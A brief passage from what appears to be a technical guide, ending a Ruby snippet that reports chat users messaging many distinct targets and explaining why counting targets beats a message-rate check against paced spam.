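  puts "fan-out: #{nick} -> #{targets.size} targets (#{targets.join(', ')})"
end
```

Counting distinct targets rather than messages per second keeps the check effective when the sender sleeps between messages, provided the window is longer than the pacing.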